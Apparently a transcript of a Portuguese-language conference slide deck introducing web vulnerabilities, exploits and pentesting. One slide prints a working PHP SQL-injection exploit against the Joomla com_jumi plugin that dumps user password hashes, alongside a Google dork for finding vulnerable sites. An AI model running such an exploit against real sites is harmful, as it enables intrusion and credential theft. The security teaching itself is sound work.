Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Mateus Lino - Vulnerabilidade em Sistemas, Expl...

Mateus Lino - Vulnerabilidade em Sistemas, Exploits, Sistemas de Pentest

Apresentar como são exploradas falhas em vulnerabilidades em sites e como funcinam os exploits. Métodos de Criação.

Agile Testers

April 08, 2017
Tweet

More Decks by Agile Testers

Other Decks in Technology

Transcript

  1. Vulnerabilidades, Exploits e Pentest • Vulnerabilidades Web • Exploits -

    Buscando falhas e automatização de exploração • Pentest - Sistemas Operacionais
  2. Quem sou? Meu nome é Mateus Lino, 19 anos, sou

    apaixonado por programação desde pequeno, aos 10 anos já escrevia meus primeiros programas em Bat. Comecei a estudar VB.NET (para aplicações Windows) e no Linux foi onde comecei a aprender sobre segurança digital. Após comecei a estudar PHP juntamente com front end. Hoje cursa Ciência da Computação e desenvolve em Ruby, Ruby on Rails, Python e JS. Atualmente trabalho na Cloud Tech Brasil, como Analista de Segurança e sou fundador da HatBashBR, grupo de pesquisa sobre segurança digital.
  3. Vulnerabilidades Web - OWASP • Injection - SQL injection •

    Broken Authentication and Session Management - Manipulação de Sessões • Cross-Site-Scripting (XSS)
  4. Injection - SQL injection SQL Injection geralmente ocorre quando você

    pede para um usuário uma entrada como seu nome de usuário / senha e, em vez de um nome / senha, o usuário te dá uma instrução SQL que você vai executar. txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId -> SELECT * FROM Users WHERE UserId = 105 OR 1=1
  5. Autenticação, GET, Brute Force Crie: • Autenticações, • Níveis de

    usuários, • Cuidado com os arquivos “confidenciais”. • Demonstração de Cookies/Sessões Burladas.
  6. Exploits Exploit's são pedaços de um software ou uma sequência

    de comandos elaborados que conseguem explorar uma vulnerabilidade X. Comandos, “querys”, transferências de dados (payload) específicos que juntados com algumas linhas de programação pode fazer um grande estrago.
  7. Plugin Joomla - Com_Jumi Dork: inurl:com_jumi index of <?php #Author:

    Mateus a.k.a Dctor - Hatbash br #fb : facebook.com/hatbashbr/ $host = "URL"; $payload = "index.php?option=com_jumi&fileid=2&Itemid=4+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/jos_users+--+"; $u = $host.$payload; $random= array( 'http'=>array( 'method'=>"GET", 'header'=>"Accept-language: en\r\n" . "Cookie: foo=bar\r\n" . "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051008 Fedora/1.5-0.5.0.beta2 Firefox/1.4.1\r\n" ));$agent= stream_context_create($random); $p = file_get_contents($u, false, $agent); if(preg_match_all('/([0-9a-fA-F]{32})/', $p, $r)){ $string = implode(", ", $r['0']); echo "[+] Target: ".$host ."\n"; echo "[+] Passwords :\n"; echo "\�33[01;31m" .$string. "\n"; }else{echo "Not Vull";} ?>
  8. Vulnerabilidades: como encontrá-las ? Google Hacking Google Hacking - Pesquisa

    Avançada utilizando Google e/ou outros buscadores. Dorks. site - Faz uma busca específica no site informado allintitle - Faz uma busca específica de palavras que estão no título do site allinurl - Faz uma busca específica de arquivos e palavras na URL inurl: busca na URL filetype = Busca de Arquivos específicos link: Procura em Links
  9. Ruby on Rails e NodeJS - Existem falhas? Deixo essa

    perguntas pra vocês: http://www.cvedetails.com/product/22804/Nodejs-Nodejs.html?vendor_id=12 113 https://www.cvedetails.com/vulnerability-list/vendor_id-12043/product_id-225 68/Rubyonrails-Ruby-On-Rails.html